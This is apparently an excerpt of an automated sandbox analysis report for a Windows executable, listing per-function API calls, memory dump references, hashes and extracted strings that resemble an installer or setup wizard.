                                                                                                                • API ID: H_prologMessageSend__ftol$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2561276666-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00454132
                                                                                                                • SendMessageA.USER32(00000000,00000187,00424688,00000000), ref: 00454148
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045416A
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00454192
                                                                                                                • SendMessageA.USER32(00000000,00000187,00424688,00000000), ref: 004541A8
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004541CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2326795674-0
                                                                                                                • Opcode ID: 7823ba83b9b4b2bde09d4142e0da30b20efe51622fa7d7590f7ca6511cb7c970
                                                                                                                • Instruction ID: 3accbac8d4c820b9a490b258e36431a25253bebf7418b9a2f07460033ef3efce
                                                                                                                • Opcode Fuzzy Hash: 7823ba83b9b4b2bde09d4142e0da30b20efe51622fa7d7590f7ca6511cb7c970
                                                                                                                • Instruction Fuzzy Hash: A7314D31104B45EBC215CF65CC84C27BBE9FF95389B01492EB9918B262CB35EC86CB29
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004586E8
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00458751
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0045875E
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0045878D
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0045879A
                                                                                                                • PostMessageA.USER32(?,?,?,?), ref: 004587B7
                                                                                                                Similarity
                                                                                                                • API ID: ClientScreen$MessageParentPost
                                                                                                                • String ID:
                                                                                                                • API String ID: 1061243768-0
                                                                                                                • Opcode ID: 10b95b089efa1b1f29aca84f8d33e2f1643541ffbc64581302a4a41bdf219db8
                                                                                                                • Instruction ID: c84670a856872c5c6493c3174f33add3df626ce2ec2b4fed9489b4fc00db4d0a
                                                                                                                • Opcode Fuzzy Hash: 10b95b089efa1b1f29aca84f8d33e2f1643541ffbc64581302a4a41bdf219db8
                                                                                                                • Instruction Fuzzy Hash: EF319E31500204ABEB204F58DC8897B77B4EB08342F20842FEC52F2666DF38DD95DB59
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004208D5
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 004208FE
                                                                                                                • __ftol.LIBCMT ref: 0042090D
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • IsWindow.USER32(?), ref: 00420956
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420973
                                                                                                                • SendMessageA.USER32(?,00000151,00000000,?), ref: 004209A4
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$MessageSend__ftol$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 3039016283-0
                                                                                                                • Opcode ID: de6621fe2cd55b114d4ad39fca9d98210b0e17b4f15ec92d76834ccba1b4460d
                                                                                                                • Instruction ID: dd1a8690cd567b92cacc73c66742930b14a887250b674c969e4e9b1dd606b689
                                                                                                                • Opcode Fuzzy Hash: de6621fe2cd55b114d4ad39fca9d98210b0e17b4f15ec92d76834ccba1b4460d
                                                                                                                • Instruction Fuzzy Hash: 2E31D471A00219AFDB10FFA2DC81EEFB7B9EF44344F00442EF652A7192D7799A418B55
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045404D
                                                                                                                • SendMessageA.USER32(00000000,00000187,00000000,00000000), ref: 00454063
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045407A
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004540A5
                                                                                                                • SendMessageA.USER32(00000000,00000187,00000000,00000000), ref: 004540BB
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004540D2
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2326795674-0
                                                                                                                • Opcode ID: f73f37e66e0093ad7426274aa7fc7639bd6db05b8b5d674beef4313750dafd8a
                                                                                                                • Instruction ID: cb71a663e24d86ca5d8089c706ae1e1754c4498fe83752c4e92db16ba581ce41
                                                                                                                • Opcode Fuzzy Hash: f73f37e66e0093ad7426274aa7fc7639bd6db05b8b5d674beef4313750dafd8a
                                                                                                                • Instruction Fuzzy Hash: 81318D31104745EFC3148F66CD80C17BBE8FF84B59B21491EBA818B2A2C736EC46CB65
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00458AFB
                                                                                                                  • Part of subcall function 004CCDD5: __EH_prolog.LIBCMT ref: 004CCDDA
                                                                                                                  • Part of subcall function 004CCDD5: GetDC.USER32(?), ref: 004CCE03
                                                                                                                  • Part of subcall function 0040A998: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040A9A1
                                                                                                                  • Part of subcall function 004CC886: SelectObject.GDI32(?,00000000), ref: 004CC8A8
                                                                                                                  • Part of subcall function 004CC886: SelectObject.GDI32(?,00000000), ref: 004CC8BE
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458B4C
                                                                                                                • SendMessageA.USER32(?,00000194,?,00000000), ref: 00458BB7
                                                                                                                  • Part of subcall function 004CE5EB: SendMessageA.USER32(?,0000018A,?,00000000), ref: 004CE603
                                                                                                                  • Part of subcall function 004CE5EB: SendMessageA.USER32(?,00000189,?,00000000), ref: 004CE61C
                                                                                                                • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00458B6F
                                                                                                                • GetSystemMetrics.USER32(00000005), ref: 00458B77
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458B98
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prologObjectSelect$ExtentMetricsPoint32SystemText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2552693466-0
                                                                                                                • Opcode ID: 9d3534a4fe118013e16237af719714a3222950b0b6619e8b803ab026f5aeb325
                                                                                                                • Instruction ID: 4e24ceb2a9a9eafaf5ce023eaf1911c9882dc422bf96a0dad04e5962e0b21e8b
                                                                                                                • Opcode Fuzzy Hash: 9d3534a4fe118013e16237af719714a3222950b0b6619e8b803ab026f5aeb325
                                                                                                                • Instruction Fuzzy Hash: 1E314C71900209AFCB14EFA5DD81EEEFBB8EF54354F10412EF501B22A1DB745A06CB64
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00444655
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0044441E: __EH_prolog.LIBCMT ref: 00444423
                                                                                                                  • Part of subcall function 00445163: __EH_prolog.LIBCMT ref: 00445168
                                                                                                                  • Part of subcall function 00444A05: __EH_prolog.LIBCMT ref: 00444A0A
                                                                                                                  • Part of subcall function 00444A05: GetFileAttributesA.KERNEL32(?,00510870,?,?,?,?,00000000), ref: 00444A23
                                                                                                                  • Part of subcall function 00444CF5: __EH_prolog.LIBCMT ref: 00444CFA
                                                                                                                  • Part of subcall function 00444A05: SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,00000000), ref: 00444A86
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AttributesFile$IncrementInterlocked
                                                                                                                • String ID: 8$Copy failed$Copy successful$Copying "%s"
                                                                                                                • API String ID: 214135708-1347155598
                                                                                                                • Opcode ID: 351e7756702c8f72fa6103ed87866b5e97e99e26415696db02b3b4af19a2dfb9
                                                                                                                • Instruction ID: 37c55acf32e9cf6dfb612512b4d12dbd8d607f31aa80fcdc46012d1b6e023d66
                                                                                                                • Opcode Fuzzy Hash: 351e7756702c8f72fa6103ed87866b5e97e99e26415696db02b3b4af19a2dfb9
                                                                                                                • Instruction Fuzzy Hash: 24C16274D10608EBDB54EBA5C955BEEBBF4AF48308F10441EF106A3281DB786A45CB69
                                                                                                                APIs
                                                                                                                • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 004D0A93
                                                                                                                • GlobalLock.KERNEL32(?), ref: 004D0A9B
                                                                                                                • lstrcpyn.KERNEL32(?,00000000,00000208), ref: 004D0AAE
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 004D0AB7
                                                                                                                • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 004D0ACF
                                                                                                                • PostMessageA.USER32(?,000003E4,?,00000000), ref: 004D0ADC
                                                                                                                  • Part of subcall function 004C95B9: IsWindowEnabled.USER32(?), ref: 004C95C3
                                                                                                                Similarity
                                                                                                                • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 2333435275-0
                                                                                                                • Opcode ID: 80c4f473cda63ebbe29d2c3595a2067c467c10bd839c859f2be82989af61cddf
                                                                                                                • Instruction ID: 03520cb8da1c923db593af3c715295f8be7c9964e64948a690e3b8b2b3f7d9f9
                                                                                                                • Opcode Fuzzy Hash: 80c4f473cda63ebbe29d2c3595a2067c467c10bd839c859f2be82989af61cddf
                                                                                                                • Instruction Fuzzy Hash: 4801AD76600108BFDB01AFA0DC89EDF7BBDEF58304F00417AB90996162DB749E059B64
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046838D
                                                                                                                  • Part of subcall function 0045E445: IsWindow.USER32(?), ref: 0045E45D
                                                                                                                  • Part of subcall function 0045E445: GetClientRect.USER32(?,?), ref: 0045E49A
                                                                                                                  • Part of subcall function 004689D6: __EH_prolog.LIBCMT ref: 004689DB
                                                                                                                  • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                                                  • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$ClientDecrementIncrementRectWindowlstrlen
                                                                                                                • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                                                • API String ID: 3293047042-2679619293
                                                                                                                • Opcode ID: d8a3774e77b3fd3590e29db3d57dbd696cb2cdaf0d1815ef2357dc87ca4e7c0a
                                                                                                                • Instruction ID: 400d5ad09e73d13d885dbaef853bc776472cde1c6edf188b783ca20929b7f525
                                                                                                                • Opcode Fuzzy Hash: d8a3774e77b3fd3590e29db3d57dbd696cb2cdaf0d1815ef2357dc87ca4e7c0a
                                                                                                                • Instruction Fuzzy Hash: 00819471A006099FCF04DF69C941ADE37A5FF09314F01422EFC15EB292EBB9AA45CB95
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046C9D8
                                                                                                                  • Part of subcall function 00468388: __EH_prolog.LIBCMT ref: 0046838D
                                                                                                                • GetDC.USER32(?), ref: 0046CB2B
                                                                                                                • ReleaseDC.USER32(?,?), ref: 0046CB84
                                                                                                                Strings
                                                                                                                • IDS_CTRL_HEADINGTEXT_BODY, xrefs: 0046CAA5
                                                                                                                • IDS_CTRL_STATICTEXT_BODY, xrefs: 0046CA5C
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Release
                                                                                                                • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY
                                                                                                                • API String ID: 4065112704-3606236380
                                                                                                                • Opcode ID: a940f1d11d32cd1209a7a2244eb79ba5ac3e9fb4beef388d05a7c1ba29249bb3
                                                                                                                • Instruction ID: f219300eb766582377f6677a51dbe486fc020a33182b9b6bc0bae3f1e035b6cb
                                                                                                                • Opcode Fuzzy Hash: a940f1d11d32cd1209a7a2244eb79ba5ac3e9fb4beef388d05a7c1ba29249bb3
                                                                                                                • Instruction Fuzzy Hash: 817188719006099FCF01DF59C881AEEBBB2FF49314B00812EFC19AB251D7B9AA45CF95
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046811C
                                                                                                                  • Part of subcall function 0044FC1E: __EH_prolog.LIBCMT ref: 0044FC23
                                                                                                                  • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                                                  • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked
                                                                                                                • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                                                • API String ID: 2206737547-2679619293
                                                                                                                • Opcode ID: a3f3b65316b98b94cf0b9e912e700f2dbe178ac0de3f89540e27e206b973e947
                                                                                                                • Instruction ID: d3287a7e1ee0420e867fcb5a16a498850322c23a212d365a6c6c3676f494c591
                                                                                                                • Opcode Fuzzy Hash: a3f3b65316b98b94cf0b9e912e700f2dbe178ac0de3f89540e27e206b973e947
                                                                                                                • Instruction Fuzzy Hash: 46719570900B06EBCB04EFAAC956AAEBBB4FF44314F10421FE515932C1DB786A51CBA5
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0041CAB3
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prologIncrementInterlocked
                                                                                                                • String ID: 0:R$DIRECT$PROXY$SOCKS
                                                                                                                • API String ID: 1487423697-3623570745
                                                                                                                • Opcode ID: ada8f0a84018501a20d66321760a132a19b1a75b1e7a85cba4c765be8950b41a
                                                                                                                • Instruction ID: 1663e7dfa307c1280a13a731145daf0402fd0f10e9e89f1c2dab1e25c8732c8e
                                                                                                                • Opcode Fuzzy Hash: ada8f0a84018501a20d66321760a132a19b1a75b1e7a85cba4c765be8950b41a
                                                                                                                • Instruction Fuzzy Hash: 22618375500649EFDB04EF61D995EEE3B68EF14348F00411EF806A7281EB78AB85C765
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00438274
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • __ftol.LIBCMT ref: 004382AE
                                                                                                                • __ftol.LIBCMT ref: 004382C1
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$lstrlen
                                                                                                                • String ID: string$sub
                                                                                                                • API String ID: 2341014993-840957247
                                                                                                                • Opcode ID: adf2a7eb88be220b28ef7be46605e97a351adad90b56ddfb9ffad6d0991728f6
                                                                                                                • Instruction ID: 381909d5fdf81ba84d1b693d844039a228266b458f74f633bec1436e6fbcf363
                                                                                                                • Opcode Fuzzy Hash: adf2a7eb88be220b28ef7be46605e97a351adad90b56ddfb9ffad6d0991728f6
                                                                                                                • Instruction Fuzzy Hash: E3412431809615B6DB15B766DC02FDE76289F56728F240A0FF821722D2EF7D174243AE
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: __ftol
                                                                                                                • String ID: invalid format$invalid option$obsolete option `*w' to `read'$too many arguments
                                                                                                                • API String ID: 495808979-4157779061
                                                                                                                • Opcode ID: 15b9554bd7a4ea5b2a5a601a280a116ebceade17c55b0f6e2630c6f085d4b515
                                                                                                                • Instruction ID: e0c2392f2d2f685b4b337f94f51beba311b29aa7caf00e323d1eb288a706bb60
                                                                                                                • Opcode Fuzzy Hash: 15b9554bd7a4ea5b2a5a601a280a116ebceade17c55b0f6e2630c6f085d4b515
                                                                                                                • Instruction Fuzzy Hash: 5531246250412667D2017669BC469AF768CDEE33ADF140E2BF90491242FB0E5A5603FF
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpy$lstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 367037083-0
                                                                                                                • Opcode ID: c1b4aa99c591744d77e24262de923c41514dfdb4cba4f1819edd85ae8098d2cf
                                                                                                                • Instruction ID: c2000fae65e973bf682877ba267cc6e0eafe41b7713f767df27ed37b344e3950
                                                                                                                • Opcode Fuzzy Hash: c1b4aa99c591744d77e24262de923c41514dfdb4cba4f1819edd85ae8098d2cf
                                                                                                                • Instruction Fuzzy Hash: F83195F24043459ED714DF64AC818AFB7E8ADE9304F44492EF99587201E635EA0DC7A7
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004789DB
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlocked
                                                                                                                • String ID: Name$SessionVar$Type$Value
                                                                                                                • API String ID: 3164693477-3658809614
                                                                                                                • Opcode ID: c30fba80bfb5f512735ab7995e7e5ebdfa5f859731753a1f4153265da0c30fc5
                                                                                                                • Instruction ID: 559d49df9738f0f2aa537b90bad7d7da7e2bc04790b709e0d6a737118b72b1b9
                                                                                                                • Opcode Fuzzy Hash: c30fba80bfb5f512735ab7995e7e5ebdfa5f859731753a1f4153265da0c30fc5
                                                                                                                • Instruction Fuzzy Hash: C031A035600204AACB05FB66C45ABFE7B669F80358F04C46FF416A72C2CF7CAE46C659
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004D4A63
                                                                                                                  • Part of subcall function 004D4B4F: lstrlen.KERNEL32(00000104,00000000,?,004D4A93), ref: 004D4B86
                                                                                                                • lstrcpy.KERNEL32(?,.HLP), ref: 004D4B04
                                                                                                                • lstrcat.KERNEL32(?,.INI), ref: 004D4B31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamelstrcatlstrcpylstrlen
                                                                                                                • String ID: .HLP$.INI
                                                                                                                • API String ID: 2421895198-3011182340
                                                                                                                • Opcode ID: 2a8125e53c11a3b11c689ea8270c5afba2f51a438d7ab26526c8496349fead54
                                                                                                                • Instruction ID: 6fc6edcaa4ee4fa5cc92a090c15fa21088debc593625c09b02b9fd64cf0048fe
                                                                                                                • Opcode Fuzzy Hash: 2a8125e53c11a3b11c689ea8270c5afba2f51a438d7ab26526c8496349fead54
                                                                                                                • Instruction Fuzzy Hash: 6A3196B55047189FDB20EB71CC84BC6B7FCAB08314F10496BE199D3252DB74AA848F58
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00438B2D
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked
                                                                                                                • String ID: Drive$Extension$Filename$Folder
                                                                                                                • API String ID: 2206737547-2892895018
                                                                                                                • Opcode ID: d1446d1aa75ba1a8266e846b7f80a1937c37d196177ba52ef51e3ea5255a23eb
                                                                                                                • Instruction ID: ff92154404ea6af389b92728fe176bb0ebe635ab6eeb443a2fc1549e66cd24c7
                                                                                                                • Opcode Fuzzy Hash: d1446d1aa75ba1a8266e846b7f80a1937c37d196177ba52ef51e3ea5255a23eb
                                                                                                                • Instruction Fuzzy Hash: 0D21B2B545252876DB02F7568C02FDE322C9F02358F04469BF925710D2EB6C67834BED
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00414A1A
                                                                                                                  • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                                                  • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                                                • DeleteFileA.KERNEL32(?,?,00414941,?,?,000000FA,?,?,?,?), ref: 00414AB1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesDeleteErrorH_prologLast
                                                                                                                • String ID: %s\%s.lnk$%s\%s.pif$%s\%s.url
                                                                                                                • API String ID: 1057747857-1849461506
                                                                                                                • Opcode ID: ea22b7530dbc3889c1a7079c18179179b410e677ec402c7a6711ce900b516dd8
                                                                                                                • Instruction ID: d92c79b5f5e9cfdc62d802060550f424704f1858d4e759b7e3212320cb182e55
                                                                                                                • Opcode Fuzzy Hash: ea22b7530dbc3889c1a7079c18179179b410e677ec402c7a6711ce900b516dd8
                                                                                                                • Instruction Fuzzy Hash: BE21AE3190021EBADF00EBA1CD51EEFBB69FF10389F00806EF815A2191D7789A448B58
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046CBF9
                                                                                                                  • Part of subcall function 004688E5: __EH_prolog.LIBCMT ref: 004688EA
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY$Title$Your text goes here.
                                                                                                                • API String ID: 3243491680-687506183
                                                                                                                • Opcode ID: 525c8266ca3ddf2e46b0d668a3e02e270a661406b98f022142d997e70473989d
                                                                                                                • Instruction ID: 105b25ec1624ad8ba1d423fa81cba85b5b27e6adb824cc79459d558898aa8880
                                                                                                                • Opcode Fuzzy Hash: 525c8266ca3ddf2e46b0d668a3e02e270a661406b98f022142d997e70473989d
                                                                                                                • Instruction Fuzzy Hash: 200184B4A20609BBDF08BF59C917AEE7FB1EB05714F00421EF011621D2CBB81B4086EA
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000005,?,?,?,0049DE6C,?), ref: 0049CB8D
                                                                                                                Strings
                                                                                                                • %02u/%02u/%02u %02u:%02u, xrefs: 0049CE64
                                                                                                                Memory Dump Source
